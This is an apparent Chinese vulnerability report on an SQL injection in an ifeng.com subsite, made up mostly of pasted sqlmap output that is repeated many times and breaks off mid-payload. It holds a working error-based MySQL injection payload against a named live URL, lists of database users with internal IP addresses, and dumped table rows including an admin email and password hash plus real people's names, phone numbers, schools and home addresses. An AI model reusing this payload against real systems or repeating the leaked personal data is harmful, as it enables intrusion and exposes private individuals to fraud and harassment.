凤凰网分站SQL注入漏洞注入地址:http://app.bbs.ifeng.com/dkjs/data.php?callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined
单引号回车后报错,爆路径,于是丢到sqlmap中跑
之后就什么都有了
首先是数据库列表
之后查看是否是dba之后查看用户列表
完完全全的暴露了内网的ip和其他数据库地址
剩下的看代码吧
<code>sqlmap identified the following injection points with a total of 1624 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />available databases [11]:<br />[*] app_bbs<br />[*] app_news<br />[*] app_weather<br />[*] apphistory_news<br />[*] appmil_news<br />[*] appsports_news<br />[*] baike_health<br />[*] baike_house<br />[*] information_schema<br />[*] mysql<br />[*] test<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />database management system users [234]:<br />[*] ''@'localhost'<br />[*] 'B74wNuTbbx'@'10.11.2.89'<br />[*] 'B74wNuTbbx'@'10.11.2.90'<br />[*] 'B74wNuTbbx'@'10.13.2.134'<br />[*] 'B74wNuTbbx'@'10.13.2.135'<br />[*] 'B74wNuTbbx'@'10.13.2.176'<br />[*] 'B74wNuTbbx'@'10.13.2.177'<br />[*] 'B74wNuTbbx'@'220.181.67.192'<br />[*] 'iadmin'@'211.151.61.77'<br />[*] 'root'@'10.13.2.132'<br />[*] 'root'@'10.13.2.134'<br />[*] 'root'@'10.13.2.135'<br />[*] 'root'@'10.13.2.176'<br />[*] 'root'@'10.13.2.177'<br />[*] 'root'@'127.0.0.1'<br />[*] 'root'@'192.168.2.162'<br />[*] 'root'@'192.168.2.167'<br />[*] 'root'@'220.181.24.100'<br />[*] 'root'@'220.181.24.166'<br />[*] 'root'@'220.181.24.2'<br />[*] 'root'@'220.181.67.192'<br />[*] 'root'@'localhost'<br />[*] 'zabbix'@'127.0.0.1'<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />available databases [11]:<br />[*] app_bbs<br />[*] app_news<br />[*] app_weather<br />[*] apphistory_news<br />[*] appmil_news<br />[*] appsports_news<br />[*] baike_health<br />[*] baike_house<br />[*] information_schema<br />[*] mysql<br />[*] test<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_bbs<br />[1 table]<br />+------+<br />| dkjs |<br />+------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: baike_house<br />[32 tables]<br />+-----------------------+<br />| wiki_activation |<br />| wiki_advertisement |<br />| wiki_attachment |<br />| wiki_autosave |<br />| wiki_banned |<br />| wiki_blacklist |<br />| wiki_category |<br />| wiki_channel |<br />| wiki_comment |<br />| wiki_creditdetail |<br />| wiki_doc |<br />| wiki_docreference |<br />| wiki_edition |<br />| wiki_focus |<br />| wiki_friendlink |<br />| wiki_language |<br />| wiki_lock |<br />| wiki_plugin |<br />| wiki_pluginhook |<br />| wiki_pluginvar |<br />| wiki_pms |<br />| wiki_regular |<br />| wiki_regular_relation |<br />| wiki_regulargroup |<br />| wiki_session |<br />| wiki_setting |<br />| wiki_style |<br />| wiki_synonym |<br />| wiki_task |<br />| wiki_user |<br />| wiki_usergroup |<br />| wiki_word |<br />+-----------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATsqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />available databases [11]:<br />[*] app_bbs<br />[*] app_news<br />[*] app_weather<br />[*] apphistory_news<br />[*] appmil_news<br />[*] appsports_news<br />[*] baike_health<br />[*] baike_house<br />[*] information_schema<br />[*] mysql<br />[*] test<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: baike_house<br />Table: wiki_user<br />[22 columns]<br />+------------+-----------------------+<br />| Column | Type |<br />+------------+-----------------------+<br />| birthday | int(10) unsigned |<br />| checkup | int(10) unsigned |<br />| creates | mediumint(8) unsigned |<br />| credits | int(10) |<br />| edits | mediumint(8) unsigned |<br />| email | char(50) |<br />| gender | tinyint(1) |<br />| groupid | smallint(6) unsigned|<br />| image | varchar(255) |<br />| language | varchar(20) |<br />| lastip | char(15) |<br />| lasttime | int(10) unsigned |<br />| location | varchar(30) |<br />| password | char(32) |<br />| regip | char(15) |<br />| regtime | int(10) unsigned |<br />| signature| text |<br />| style | varchar(20) |<br />| timeoffset | varchar(20) |<br />| uid | mediumint(8) unsigned |<br />| username | char(15) |<br />| views | int(10) unsigned |<br />+------------+-----------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: baike_house<br />Table: wiki_user<br />[10 entries]<br />+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br />| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |<br />+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br />| 1 | 4 | | default | 0 | 59 | | [email protected] | 0 | 220.181.24.2 | 1 | 1270174931 | 21 | 0 | 1270174967 | | house_admin | 0 | e10adc3949ba59abbe56e057f20f883e | zh | | 8 |<br />| 2 | 4 | | default | 2 | 171 | | | 0 | 220.181.67.192 | 1 | 0 | 41 | 1 | 1286971633 | | 冠缨豺郎 | 0 | | zh | | 8 |<br />| 3 | 2 | | default | 0 | 29 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | zhaoxiaoxiong | 0 | | zh | | 8 |<br />| 4 | 4 | | default | 44 | 825 | | | 0 | 220.181.67.192 | 1 | 0 | 264 | 23 | 1287390647 | | 漫巴 | 0 | | zh | | 8 |<br />| 5 | 8 | | default | 7 | 1140| | | 0 | 220.181.24.2 | 1 | 0 | 663 | 124 | 1270429517 | | 西瓜妹 | 0 | | zh | | 8 |<br />| 6 | 2 | | default | 0 | 29 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | zhuantou | 0 | | zh | | 8 |<br />| 7 | 2 | | default | 0 | 30 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | c100 | 0 | | zh | | 8 |<br />| 8 | 8 | | default | 7 | 1183| | | 0 | 220.181.24.2 | 1 | 0 | 794 | 150 | 1270959387 | | 金鱼77 | 0 | | zh | | 8 |<br />| 9 | 2 | | default | 0 | 31 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | qq15236958@sina | 0 | | zh | | 8 |<br />| 10| 7 | | default | 0 | 793 | | | 0 | 220.181.24.2 | 1 | 0 | 533 | 102 | 1270545218 | | qq15236958 | 0 | | zh | | 8 |<br />+-----+---------+---------+---------+-------+-------+---------+-----------------+--------+----------------+---------+------------+---------+---------+------------+----------+-----------------+----------+----------------------------------+----------+-----------+------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: baike_house<br />Table: wiki_user<br />[11 entries]<br />+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br />| uid | groupid | image | style | edits | views | regip | email | gender | lastip| checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |<br />+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br />| 100 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | yangganghong | 0 | | zh | | 8 |<br />| 101 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 肖张氏 | 0 | | zh | | 8 |<br />| 102 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | hanruikai | 0 | | zh | | 8 |<br />| 103 | 2 | | default | 0 | 7 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | cbgwllcjt | 0 | | zh | | 8 |<br />| 104 | 2 | | default | 0 | 4 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | gk777 | 0 | | zh | | 8 |<br />| 105 | 2 | | default | 0 | 4 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 品酸 | 0 | | zh | | 8 |<br />| 106 | 2 | | default | 0 | 3 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | daiyb | 0 | | zh | | 8 |<br />| 107 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 欧阳君山 | 0 | | zh | | 8 |<br />| 108 | 2 | | default | 0 | 3 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 小马不识途 | 0 | | zh | | 8 |<br />| 109 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | gxy891029 | 0 | | zh | | 8 |<br />| 110 | 2 | | default | 0 | 6 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 晓飞416329 | 0 | | zh | | 8 |<br />+-----+---------+---------+---------+-------+-------+---------+---------+--------+---------+---------+---------+---------+---------+----------+----------+--------------+----------+----------+----------+-----------+------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />available databases [11]:<br />[*] app_bbs<br />[*] app_news<br />[*] app_weather<br />[*] apphistory_news<br />[*] appmil_news<br />[*] appsports_news<br />[*] baike_health<br />[*] baike_house<br />[*] information_schema<br />[*] mysql<br />[*] test<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: baike_health<br />[35 tables]<br />+------------------------+<br />| wiki_activation |<br />| wiki_advertisement |<br />| wiki_attachment |<br />| wiki_autosave |<br />| wiki_banned |<br />| wiki_blacklist |<br />| wiki_category |<br />| wiki_category_20100224 |<br />| wiki_channel |<br />| wiki_comment |<br />| wiki_creditdetail |<br />| wiki_doc |<br />| wiki_doc_20100224_20 |<br />| wiki_doc_temp_copy |<br />| wiki_docreference |<br />| wiki_edition |<br />| wiki_focus |<br />| wiki_friendlink |<br />| wiki_language |<br />| wiki_lock |<br />| wiki_plugin |<br />| wiki_pluginhook |<br />| wiki_pluginvar |<br />| wiki_pms |<br />| wiki_regular |<br />| wiki_regular_relation|<br />| wiki_regulargroup |<br />| wiki_session |<br />| wiki_setting |<br />| wiki_style |<br />| wiki_synonym |<br />| wiki_task |<br />| wiki_user |<br />| wiki_usergroup |<br />| wiki_word |<br />+------------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: baike_health<br />Table: wiki_user<br />[11 entries]<br />+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br />| uid | groupid | image | style | edits | views | regip | email | gender | lastip | checkup | regtime | credits | creates | lasttime | location | username | birthday | password | language | signature | timeoffset |<br />+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br />| 100 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 新娘jiujiu | 0 | | zh | | 8 |<br />| 101 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 江湖一鸣 | 0 | | zh | | 8 |<br />| 102 | 2 | | default | 0 | 40 | | | 0 | 59.175.185.178 | 1 | 0 | 21 | 0 | 1267751010 | | erxy | 0 | | zh | | 8 |<br />| 103 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | fuf | 0 | | zh | | 8 |<br />| 104 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 墨侃 | 0 | | zh | | 8 |<br />| 105 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | maiky1987 | 0 | | zh | | 8 |<br />| 106 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | yantachenzhong | 0 | | zh | | 8 |<br />| 107 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | chen0928 | 0 | | zh | | 8 |<br />| 108 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 高老庄0560 | 0 | | zh | | 8 |<br />| 109 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | 为了国家的80后 | 0 | | zh | | 8 |<br />| 110 | 2 | | default | 0 | 0 | | | 0 | | 1 | 0 | 20 | 0 | 0 | | bxbglg123 | 0 | | zh | | 8 |<br />+-----+---------+---------+---------+-------+-------+---------+---------+--------+----------------+---------+---------+---------+---------+------------+----------+----------------+----------+----------+----------+-----------+------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />available databases [11]:<br />[*] app_bbs<br />[*] app_news<br />[*] app_weather<br />[*] apphistory_news<br />[*] appmil_news<br />[*] appsports_news<br />[*] baike_health<br />[*] baike_house<br />[*] information_schema<br />[*] mysql<br />[*] test<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_bbs<br />[1 table]<br />+------+<br />| dkjs |<br />+------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />Database: app_bbs<br />Table: dkjs<br />[3 entries]<br />+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br />| id| city | name | story | phone | school | is_wap | photo3 | verify | photo2 | photo1 | address | province | submit_time |<br />+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br />| 122 | 南阳 | 李果 | 失业,多次评为优秀教师,模范班主任 | 13037606030 | 河南邓州市穰东镇葛营小学 | 0 | 4 | yes | 4 | 4 | 河南省邓州市穰东镇前庄村轩寺组 | 河南 | 2010-02-05 16:08:03 |<br />| 123 | | 晓清 | | 13017329166 | 某学校 | 0 | 4 | yes | 4 | 4 | 湖南 | 湖南 | 2010-02-05 16:14:31 |<br />| 124 | 梧州 | 郭伟民| | 13878431590 | 岑溪市樟木镇思孟联办中学 | 0 | 4 | yes | 4 | 4 | 岑溪市城中路20号 | 广西 | 2010-02-05 16:14:38 |<br />+-----+---------+------+-------------------+-------------+--------------+--------+--------+--------+--------+--------+-----------------+----------+---------------------+<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: callback=jsonp1399201820642&_=1399201898980&keyword=undefined&province=undefined&city=undefined&page=3&limit=undefined_by=undefined AND (SELECT 6107 FROM(SELECT COUNT(*),CONCAT(0x3a6176673a,(SELECT (CASE WHEN (6107=6107) THEN 1 ELSE 0 END)),0x3a7464663a,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)_type=undefined<br />---<br /><br />sqlmap identified the following injection points with a total of 0 HTTP(s) requests:<br />---<br />Place: GET<br />Parameter: order_by<br /> Type: error-based<br /> Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause<br /> Payload: 